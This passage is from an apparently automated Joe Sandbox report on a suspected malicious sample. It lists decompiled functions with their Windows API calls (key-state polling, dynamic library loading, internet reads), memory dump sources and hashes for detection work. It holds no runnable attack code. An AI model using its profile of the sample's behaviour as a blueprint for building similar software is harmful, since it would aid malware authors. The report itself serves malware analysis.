                                                                                                                        • Instruction Fuzzy Hash: 3D514C35A002199FDB05EF64C885AA9BFF5FF89314F098458E849AB362DB31ED51CB90
                                                                                                                        Function 00598EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00598F40
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00598FD0
                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00598FEC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00599032
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00599052
                                                                                                                          • Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00581043,?,75B8E610), ref: 0052F6E6
                                                                                                                          • Part of subcall function 0052F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0056FA64,00000000,00000000,?,?,00581043,?,75B8E610,?,0056FA64), ref: 0052F70D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 666041331-0
                                                                                                                        • Opcode ID: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
                                                                                                                        • Instruction ID: fbbef9e352b1613c8fa91f9117b92fae8a2c555a3f6b240144b2c7ccdc133f01
                                                                                                                        • Opcode Fuzzy Hash: 30bd0609d7893bdcba96d7795368c2ecc48da038254d8f637e30759a0fe88f98
                                                                                                                        • Instruction Fuzzy Hash: F9511735600205DFDB11DF58C4988A9BFF1FF8A314F0980A8E81A9B362DB31ED85CB90
                                                                                                                        Function 00542051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
                                                                                                                        • Instruction ID: 183b748e96f74ac567f286ee50b1371f51938626959f1d6d97846b07228f91e5
                                                                                                                        • Opcode Fuzzy Hash: 40dac34452c29d3d285367ec9e7711878103222d4d833ecea8f4a32398d386d7
                                                                                                                        • Instruction Fuzzy Hash: 5E41E432A002109FCB24DF78C884A9EBBF5FF89318F554569F515EB396D631AD01DB80
                                                                                                                        Function 0052912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCursorPos.USER32(?), ref: 00529141
                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 0052915E
                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00529183
                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0052919D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4210589936-0
                                                                                                                        • Opcode ID: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
                                                                                                                        • Instruction ID: 9d2a1fbd3cd9d4703fec7a0be231ebe00589e17911c06a0eb440ed85d9f8d19a
                                                                                                                        • Opcode Fuzzy Hash: 9265c970efff0707028236a189c98b5f60c89f4a6111d25c2623092567dad064
                                                                                                                        • Instruction Fuzzy Hash: 1D415F7190861BBBDF159F69D848BEEBB74FF4A324F20421AE425A32D0C7305D54DB91
                                                                                                                        Function 00583874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetInputState.USER32 ref: 005838CB
                                                                                                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00583922
                                                                                                                        • TranslateMessage.USER32(?), ref: 0058394B
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00583955
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00583966
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2256411358-0
                                                                                                                        • Opcode ID: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
                                                                                                                        • Instruction ID: 4f7c704a049fd1d16365d79e5dc282e96174174b464351dbbf9ba9575ee632fa
                                                                                                                        • Opcode Fuzzy Hash: 4503aef7a4387d5955e546e11e77a2924c56c79e8e0bc290dd450717327f6e5b
                                                                                                                        • Instruction Fuzzy Hash: 5931EB709057819EEB39EF34D849BB63FA8FB15700F04056DECA6E60A0E7F49689DB11
                                                                                                                        Function 0058CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CF38
                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 0058CF6F
                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFB4
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFC8
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,0058C21E,00000000), ref: 0058CFF2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3191363074-0
                                                                                                                        • Opcode ID: 9db23ff94507e323a1f89a2ae4c331dd96a991a506b04267b0be03a8d006850d
                                                                                                                        • Instruction ID: 8ef22b1384aa3925981837eb9b4bbcd1e2dfa31eb94be813000d1238b4842efa
                                                                                                                        • Opcode Fuzzy Hash: 9db23ff94507e323a1f89a2ae4c331dd96a991a506b04267b0be03a8d006850d
                                                                                                                        • Instruction Fuzzy Hash: 55314C71604205AFEB20EFA5D884AABBFF9FF15354B10442EFA06E2141DB30AE44DB70
                                                                                                                        Function 00571901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00571915
                                                                                                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 005719C1
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 005719C9
                                                                                                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 005719DA
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 005719E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3382505437-0
                                                                                                                        • Opcode ID: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
                                                                                                                        • Instruction ID: 3486ec42c9f545e93dc0979e5a5cae22f7656c2c3d0fa965b371baba725cc6ab
                                                                                                                        • Opcode Fuzzy Hash: 4690d1f04d452f7130f5e8eda3d6dce698ed176c45c72cb382b4a5dfd1410890
                                                                                                                        • Instruction Fuzzy Hash: 1A31CD71A00219EFCB00CFACD998ADE3FB5FB55314F108229FA25AB2D0C7709945EB90
                                                                                                                        Function 00590930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 00590951
                                                                                                                        • GetForegroundWindow.USER32 ref: 00590968
                                                                                                                        • GetDC.USER32(00000000), ref: 005909A4
                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 005909B0
                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 005909E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4156661090-0
                                                                                                                        • Opcode ID: 04ef9c01de7544c68aa15d2e3ad33063e8de2b277dcde7cc869954cf848ff025
                                                                                                                        • Instruction ID: 5b628a112ce0d0d5a01c5e1db127711a9e8f6c3e44d1a8b7dd4bb2a884670cdb
                                                                                                                        • Opcode Fuzzy Hash: 04ef9c01de7544c68aa15d2e3ad33063e8de2b277dcde7cc869954cf848ff025
                                                                                                                        • Instruction Fuzzy Hash: 8C218435600204AFEB04EF69C949AAEBFF9FF85700F048468E84AA7352DB30EC44DB50
                                                                                                                        Function 0054CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0054CDC6
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0054CDE9
                                                                                                                          • Part of subcall function 00543820: RtlAllocateHeap.NTDLL(00000000,?,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6,?,00511129), ref: 00543852
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0054CE0F
                                                                                                                        • _free.LIBCMT ref: 0054CE22
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0054CE31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 336800556-0
                                                                                                                        • Opcode ID: 7959bd8c376b5cce12c976a6576b44b613f91bd1c97f61c912111dcd1c1dd492
                                                                                                                        • Instruction ID: ff3b122b98d15f41fd89ee0a481dabfdb451f0f5dca1c607a42411067adcf822
                                                                                                                        • Opcode Fuzzy Hash: 7959bd8c376b5cce12c976a6576b44b613f91bd1c97f61c912111dcd1c1dd492
                                                                                                                        • Instruction Fuzzy Hash: 3E0184726032157F276216B66C8CDBB7D6DFEC7BA93150129F905C7201EF618D1291B0
                                                                                                                        Function 00529639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 005296A2
                                                                                                                        • BeginPath.GDI32(?), ref: 005296B9
                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 005296E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: 700be6cb469864f891a56b2127dd2869d07d1816ded742b45bc34b87be9aa036
                                                                                                                        • Instruction ID: 9deb3f3eb4187ff1688620d40598047957678a1737c4e9376a05da9ae058af06
                                                                                                                        • Opcode Fuzzy Hash: 700be6cb469864f891a56b2127dd2869d07d1816ded742b45bc34b87be9aa036
                                                                                                                        • Instruction Fuzzy Hash: 7D21B331901759EBDB118F64EC48BAD3FA4BF22315F100215F450DA2F1D3706889EF98
                                                                                                                        Function 00575711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: c18d710ded64dc96bc542cf3b5c065ebfa722cd7cb7082d48ba48316ec425213
                                                                                                                        • Instruction ID: fcb6afef9bf14232aed0a2565e7e3c0099bc22d36e1514db90967f5f2333a981
                                                                                                                        • Opcode Fuzzy Hash: c18d710ded64dc96bc542cf3b5c065ebfa722cd7cb7082d48ba48316ec425213
                                                                                                                        • Instruction Fuzzy Hash: F001B5A1645A0ABBE20C5521AD86FBF7B5CFB613E4F008420FE0D9A241F7A1ED1093B4
                                                                                                                        Function 00542DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?,?,0051A976,00000010,005E1440,005113FC,?,005113C6), ref: 00542DFD
                                                                                                                        • _free.LIBCMT ref: 00542E32
                                                                                                                        • _free.LIBCMT ref: 00542E59
                                                                                                                        • SetLastError.KERNEL32(00000000,00511129), ref: 00542E66
                                                                                                                        • SetLastError.KERNEL32(00000000,00511129), ref: 00542E6F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3170660625-0
                                                                                                                        • Opcode ID: 76c2689cfbad3c8a1f9cb3947a359a94b925a4d4da3c3d8d4333b21a5c38109b
                                                                                                                        • Instruction ID: 7094b51df13324a460dbb4d6c166e14bc6fde269b9d143d75abd364b87b12f74
                                                                                                                        • Opcode Fuzzy Hash: 76c2689cfbad3c8a1f9cb3947a359a94b925a4d4da3c3d8d4333b21a5c38109b
                                                                                                                        • Instruction Fuzzy Hash: 9A01263210562267871263752C49DFB3E6DBBE13ACFA04426F41593192EE708C149020
                                                                                                                        Function 0057000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?,?,0057035E), ref: 0057002B
                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570046
                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570054
                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?), ref: 00570064
                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0056FF41,80070057,?,?), ref: 00570070
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3897988419-0
                                                                                                                        • Opcode ID: 6537f40b0cda1fb16244e354d73a21bc9fd15649829f3c76dd819279baac11ba
                                                                                                                        • Instruction ID: 693e5b2af9e0729885dc1859e284c5da0ef7a492c6ca17c16235ec61ae867d90
                                                                                                                        • Opcode Fuzzy Hash: 6537f40b0cda1fb16244e354d73a21bc9fd15649829f3c76dd819279baac11ba
                                                                                                                        • Instruction Fuzzy Hash: 46018B72600205FFDB104F69EC08BAA7EEDFB547A2F14A124F909D2250EB75DD44BBA0
                                                                                                                        Function 0057E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0057E997
                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0057E9A5
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0057E9AD
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0057E9B7
                                                                                                                        • Sleep.KERNEL32 ref: 0057E9F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2833360925-0
                                                                                                                        • Opcode ID: 3293825c91df3bfa04182e8f917a2a17ab8bd7763472831cac6621a360356396
                                                                                                                        • Instruction ID: 1a027cc55a0d5889e96598723f7ee57a72e8a5a2f720b357d7223f34b26a0757
                                                                                                                        • Opcode Fuzzy Hash: 3293825c91df3bfa04182e8f917a2a17ab8bd7763472831cac6621a360356396
                                                                                                                        • Instruction Fuzzy Hash: 71015B72D01629DBCF009BE4E85AADDBF78BF1E301F004586E606B2241CB309559EB61
                                                                                                                        Function 005710F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 842720411-0
